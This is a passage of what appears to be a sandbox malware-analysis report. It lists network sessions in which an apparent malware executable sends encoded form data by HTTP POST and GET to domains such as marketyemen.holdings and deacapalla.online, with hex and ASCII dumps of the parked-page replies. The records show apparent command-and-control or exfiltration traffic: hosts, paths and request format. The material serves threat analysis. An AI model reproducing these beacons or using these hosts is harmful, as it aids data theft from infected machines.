                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 46 7a 63 6e 46 61 49 73 6d 67 31 30 77 33 59 4d 4c 51 48 64 48 37 41 51 50 72 30 61 4f 39 62 79 79 78 52 59 37 67 53 59 68 63 32 6d 56 67 70 31 61 46 4d 36 4d 37 35 6f 50 4b 34 64 45 38 71 4b 70 6e 74 65 70 65 58 50 68 54 4d 38 4a 47 33 71 4e 76 4f 43 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dFzcnFaIsmg10w3YMLQHdH7AQPr0aO9byyxRY7gSYhc2mVgp1aFM6M75oPK4dE8qKpntepeXPhTM8JG3qNvOCA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                          Jan 10, 2025 16:43:28.215812922 CET599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWZiOGQ3MGYtZTk3MC00MTYxLWI3MzMtODY1ZjUwY2YzZDdmIiwicGFnZV90aW1lIjoxNzM2NTIzOD


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          22192.168.2.549998199.59.243.228802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:43:30.297784090 CET871OUTPOST /8efo/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.marketyemen.holdings
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 223
                                                                                                                          Origin: http://www.marketyemen.holdings
                                                                                                                          Referer: http://www.marketyemen.holdings/8efo/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 65 30 6c 6d 72 66 48 74 6c 2f 47 4c 6b 70 58 6f 4a 78 38 64 2f 75 6b 37 65 32 2b 52 36 79 6e 30 6e 4e 44 6e 65 49 32 39 70 33 6e 58 38 30 52 39 2b 6e 53 68 75 68 6b 52 48 65 54 36 35 50 47 71 57 59 35 41 45 41 64 57 71 4c 30 72 52 36 57 56 4b 6e 32 58 66 6f 2f 64 6f 65 76 5a 36 71 68 42 35 4d 4a 34 2b 77 79 52 70 78 52 4f 64 67 79 41 39 42 6b 38 77 56 4a 6b 67 48 46 45 59 4b 6a 68 41 36 58 70 38 35 69 32 44 37 47 42 48 37 42 43 6f 37 48 57 77 4f 71 6c 6f 52 6c 49 59 62 30 65 56 50 68 6f 48 63 4c 4c 41 32 4a 4d 64 6f 52 4c 65 4c 79 36 59 2b 43 73 54 46 49 69 65 6f 6e 52 5a 4f 47 2f 47 45 55 37 54 36 42 36 6e 37 2b 51 41 32 66 4a 35 55 34 65 42 57 67 4d
                                                                                                                          Data Ascii: V8=e0lmrfHtl/GLkpXoJx8d/uk7e2+R6yn0nNDneI29p3nX80R9+nShuhkRHeT65PGqWY5AEAdWqL0rR6WVKn2Xfo/doevZ6qhB5MJ4+wyRpxROdgyA9Bk8wVJkgHFEYKjhA6Xp85i2D7GBH7BCo7HWwOqloRlIYb0eVPhoHcLLA2JMdoRLeLy6Y+CsTFIieonRZOG/GEU7T6B6n7+QA2fJ5U4eBWgM
                                                                                                                          Jan 10, 2025 16:43:30.730664968 CET1236INHTTP/1.1 200 OK
                                                                                                                          date: Fri, 10 Jan 2025 15:43:30 GMT
                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                          content-length: 1146
                                                                                                                          x-request-id: aa814113-f0d8-47dd-be28-e905a6d0d9cd
                                                                                                                          cache-control: no-store, max-age=0
                                                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dFzcnFaIsmg10w3YMLQHdH7AQPr0aO9byyxRY7gSYhc2mVgp1aFM6M75oPK4dE8qKpntepeXPhTM8JG3qNvOCA==
                                                                                                                          set-cookie: parking_session=aa814113-f0d8-47dd-be28-e905a6d0d9cd; expires=Fri, 10 Jan 2025 15:58:30 GMT; path=/
                                                                                                                          connection: close
                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 46 7a 63 6e 46 61 49 73 6d 67 31 30 77 33 59 4d 4c 51 48 64 48 37 41 51 50 72 30 61 4f 39 62 79 79 78 52 59 37 67 53 59 68 63 32 6d 56 67 70 31 61 46 4d 36 4d 37 35 6f 50 4b 34 64 45 38 71 4b 70 6e 74 65 70 65 58 50 68 54 4d 38 4a 47 33 71 4e 76 4f 43 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dFzcnFaIsmg10w3YMLQHdH7AQPr0aO9byyxRY7gSYhc2mVgp1aFM6M75oPK4dE8qKpntepeXPhTM8JG3qNvOCA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                          Jan 10, 2025 16:43:30.730680943 CET599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWE4MTQxMTMtZjBkOC00N2RkLWJlMjgtZTkwNWE2ZDBkOWNkIiwicGFnZV90aW1lIjoxNzM2NTIzOD


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          23192.168.2.549999199.59.243.228802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:43:32.844831944 CET1888OUTPOST /8efo/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.marketyemen.holdings
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 1239
                                                                                                                          Origin: http://www.marketyemen.holdings
                                                                                                                          Referer: http://www.marketyemen.holdings/8efo/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 65 30 6c 6d 72 66 48 74 6c 2f 47 4c 6b 70 58 6f 4a 78 38 64 2f 75 6b 37 65 32 2b 52 36 79 6e 30 6e 4e 44 6e 65 49 32 39 70 33 76 58 38 42 4e 39 2f 42 61 68 74 68 6b 52 45 65 54 37 35 50 47 72 57 59 67 48 45 41 52 6f 71 49 4d 72 44 76 61 56 43 31 4f 58 57 6f 2f 64 71 65 76 59 6e 61 68 55 35 4d 5a 38 2b 77 69 52 70 78 52 4f 64 6a 36 41 36 51 6b 38 79 56 4a 6e 6e 48 46 41 4c 61 6a 46 41 36 75 55 38 35 33 4a 44 4b 6d 42 48 62 52 43 75 4a 66 57 32 65 71 6e 70 52 6b 4c 59 62 70 41 56 50 73 5a 48 63 58 68 41 32 78 4d 51 75 30 71 48 50 79 59 4e 63 4b 30 63 31 45 53 4b 66 44 44 63 4d 47 7a 4a 43 51 49 56 6f 56 49 6e 66 43 49 44 30 4f 45 6c 79 77 61 47 44 74 57 55 56 55 57 2b 37 6f 38 7a 57 41 74 32 66 78 46 50 74 77 53 70 78 2f 69 4a 38 76 61 39 66 50 42 64 6a 6b 30 33 37 79 68 64 69 63 4d 2b 69 37 72 54 30 37 52 59 53 7a 7a 54 78 44 43 65 36 2b 39 6b 71 56 32 69 2f 65 6f 43 4f 42 30 66 6c 79 4e 6c 78 63 35 2f 54 55 64 6f 7a 75 5a 76 4c 41 4f 79 33 47 46 77 65 63 30 73 4d 4d 4e 36 7a 49 6b 4b 6e 39 [TRUNCATED]
                                                                                                                          Data Ascii: V8=e0lmrfHtl/GLkpXoJx8d/uk7e2+R6yn0nNDneI29p3vX8BN9/BahthkREeT75PGrWYgHEARoqIMrDvaVC1OXWo/dqevYnahU5MZ8+wiRpxROdj6A6Qk8yVJnnHFALajFA6uU853JDKmBHbRCuJfW2eqnpRkLYbpAVPsZHcXhA2xMQu0qHPyYNcK0c1ESKfDDcMGzJCQIVoVInfCID0OElywaGDtWUVUW+7o8zWAt2fxFPtwSpx/iJ8va9fPBdjk037yhdicM+i7rT07RYSzzTxDCe6+9kqV2i/eoCOB0flyNlxc5/TUdozuZvLAOy3GFwec0sMMN6zIkKn9+TdQF0zysHZTxt/ofhfQ9cbZzCCZiTQ3pk8+esLsQz+4aYC1PktbXEg0Ht2/ap6JAm7bXAUkyM6nM3al5FMdMrCP3GSk4W4l7ZS/ijZ/1/uhDoVCI6pECqfEMRzlmiZP56STcJQuq8oSNrGTdldBGkgqJF0UN89psH8qKOaukCt4x8NH3aK4uLgl+rNwM8QsNerN50MLqLnj1saxsJ+p0zhLXfRHH+pSZhPoXIEWPFjnM8T6QH7Jo15zBHWUdiyiRQ+WJU52SXX/Y6BPKpRbGJn5MZ+/MtQa1IuyzCKGR7havtxZY++7Oo3IyRIPGsdzy6Cul5hTHvxjTKMSJmEfBvEdebcE+cKrXE0QsyF8P3ePnlZKWtIiRZAtbTV9pQykOJiOcFwiK9Lq8CfT6NDIrTZjBd6YjhljwWDUzq76wcog024FRZRPLEwlqqtIpSrCOPOShInHW0evQAZrn3RN1+aZl1r4hqcoAH3Rwiw8Uxg0W76oswawa6BxpaZ5RCn+sNsgXZ2Ar7r5cLJ0768LFnsj5SivIv0K7Yh5FZTl8DgBV+ZFw3pOOD9nSrU5+spHItVF2b1MKoCyl8Vozuy3MzBaJNewBHs9YkdFjIuWL4Lo1u5qGuWUo3jOBErg7UhIo6/Hu4Lvq7BzJqw3uCFhQw7AltrPeAwNUN [TRUNCATED]
                                                                                                                          Jan 10, 2025 16:43:33.313520908 CET1236INHTTP/1.1 200 OK
                                                                                                                          date: Fri, 10 Jan 2025 15:43:33 GMT
                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                          content-length: 1146
                                                                                                                          x-request-id: c931a5d2-a801-4ac7-95da-9d205984353d
                                                                                                                          cache-control: no-store, max-age=0
                                                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dFzcnFaIsmg10w3YMLQHdH7AQPr0aO9byyxRY7gSYhc2mVgp1aFM6M75oPK4dE8qKpntepeXPhTM8JG3qNvOCA==
                                                                                                                          set-cookie: parking_session=c931a5d2-a801-4ac7-95da-9d205984353d; expires=Fri, 10 Jan 2025 15:58:33 GMT; path=/
                                                                                                                          connection: close
                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 46 7a 63 6e 46 61 49 73 6d 67 31 30 77 33 59 4d 4c 51 48 64 48 37 41 51 50 72 30 61 4f 39 62 79 79 78 52 59 37 67 53 59 68 63 32 6d 56 67 70 31 61 46 4d 36 4d 37 35 6f 50 4b 34 64 45 38 71 4b 70 6e 74 65 70 65 58 50 68 54 4d 38 4a 47 33 71 4e 76 4f 43 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dFzcnFaIsmg10w3YMLQHdH7AQPr0aO9byyxRY7gSYhc2mVgp1aFM6M75oPK4dE8qKpntepeXPhTM8JG3qNvOCA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                          Jan 10, 2025 16:43:33.313556910 CET599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzkzMWE1ZDItYTgwMS00YWM3LTk1ZGEtOWQyMDU5ODQzNTNkIiwicGFnZV90aW1lIjoxNzM2NTIzOD


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          24192.168.2.550000199.59.243.228802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:43:35.382718086 CET583OUTGET /8efo/?V8=T2NGoo7Qxcyqrqz3MX03hpQWSivm/Bj7gd/lPuHNqm/993Y45l+K5XkRQc/91P+Wf5o+Fy5PkbYLO4eQBkWEWabH/6z+kfBygbxby0fAgVFPJA+Djx5wnWVAkFd+F7WzDg==&Bb6h7=gBiPvnrHa HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.marketyemen.holdings
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Jan 10, 2025 16:43:35.832009077 CET1236INHTTP/1.1 200 OK
                                                                                                                          date: Fri, 10 Jan 2025 15:43:35 GMT
                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                          content-length: 1518
                                                                                                                          x-request-id: c6c80a1a-896a-4fd0-9f98-b3303fdc46fa
                                                                                                                          cache-control: no-store, max-age=0
                                                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QmW3OxoNmgUbOjUP+UzrFo7yEZSAC+7HM+fmy2AJKK9ajuWY5TyWi9KyCfaRxQPvP2QNYdeo8C5IPNGHdmoQMw==
                                                                                                                          set-cookie: parking_session=c6c80a1a-896a-4fd0-9f98-b3303fdc46fa; expires=Fri, 10 Jan 2025 15:58:35 GMT; path=/
                                                                                                                          connection: close
                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 51 6d 57 33 4f 78 6f 4e 6d 67 55 62 4f 6a 55 50 2b 55 7a 72 46 6f 37 79 45 5a 53 41 43 2b 37 48 4d 2b 66 6d 79 32 41 4a 4b 4b 39 61 6a 75 57 59 35 54 79 57 69 39 4b 79 43 66 61 52 78 51 50 76 50 32 51 4e 59 64 65 6f 38 43 35 49 50 4e 47 48 64 6d 6f 51 4d 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QmW3OxoNmgUbOjUP+UzrFo7yEZSAC+7HM+fmy2AJKK9ajuWY5TyWi9KyCfaRxQPvP2QNYdeo8C5IPNGHdmoQMw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                          Jan 10, 2025 16:43:35.832027912 CET971INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzZjODBhMWEtODk2YS00ZmQwLTlmOTgtYjMzMDNmZGM0NmZhIiwicGFnZV90aW1lIjoxNzM2NTIzOD


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          25192.168.2.550001208.91.197.27802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:43:41.124835014 CET842OUTPOST /0pui/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.deacapalla.online
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 203
                                                                                                                          Origin: http://www.deacapalla.online
                                                                                                                          Referer: http://www.deacapalla.online/0pui/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 78 47 56 37 5a 41 55 52 36 48 67 6d 48 33 66 46 52 36 68 69 4c 31 35 62 35 50 62 6a 42 6f 63 75 5a 56 61 68 54 43 73 65 71 77 76 57 44 5a 32 49 46 47 57 5a 56 74 59 6b 74 6e 65 78 34 4a 39 46 30 37 75 55 42 72 39 34 30 59 54 2f 78 79 6f 52 79 4d 79 33 52 57 55 31 61 36 50 6c 6c 72 65 77 6e 4d 6c 51 46 74 55 75 76 56 70 61 39 6b 31 43 74 6e 32 6b 41 36 32 4d 65 35 44 66 45 6c 73 77 59 38 74 64 50 78 51 47 6e 47 75 54 79 41 34 76 65 73 73 70 77 41 53 48 53 6c 6d 51 74 62 50 73 50 72 2b 4d 67 6d 37 54 44 74 2b 61 38 4f 33 39 62 6f 4d 5a 68 78 68 4e 47 73 74 77 67 4d 70 38 4e 64 6d 37 48 64 6f 3d
                                                                                                                          Data Ascii: V8=xGV7ZAUR6HgmH3fFR6hiL15b5PbjBocuZVahTCseqwvWDZ2IFGWZVtYktnex4J9F07uUBr940YT/xyoRyMy3RWU1a6PllrewnMlQFtUuvVpa9k1Ctn2kA62Me5DfElswY8tdPxQGnGuTyA4vesspwASHSlmQtbPsPr+Mgm7TDt+a8O39boMZhxhNGstwgMp8Ndm7Hdo=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          26192.168.2.550002208.91.197.27802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:43:43.675221920 CET862OUTPOST /0pui/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.deacapalla.online
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 223
                                                                                                                          Origin: http://www.deacapalla.online
                                                                                                                          Referer: http://www.deacapalla.online/0pui/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 78 47 56 37 5a 41 55 52 36 48 67 6d 48 55 48 46 57 70 5a 69 4d 56 35 61 38 50 62 6a 49 49 64 47 5a 56 65 68 54 48 49 77 74 43 4c 57 44 34 47 49 4c 6e 57 5a 53 74 59 6b 6d 48 65 77 33 70 39 4f 30 37 69 36 42 71 42 34 30 59 58 2f 78 79 59 52 79 66 61 77 54 47 55 67 58 61 50 6e 68 72 65 77 6e 4d 6c 51 46 74 6f 51 76 56 68 61 39 58 74 43 73 46 4f 72 47 4b 32 50 4a 4a 44 66 4a 46 74 33 59 38 74 2f 50 30 35 70 6e 45 57 54 79 46 38 76 64 39 73 75 2b 41 54 4f 50 31 6e 46 75 70 71 41 50 64 36 53 6a 6d 75 51 56 76 47 79 35 34 47 58 42 4b 45 78 79 52 4e 31 57 2f 6c 48 78 38 49 56 58 2b 32 4c 5a 4b 2f 67 4c 71 32 55 59 5a 4d 75 4f 79 4f 39 77 50 64 31 44 48 53 6e
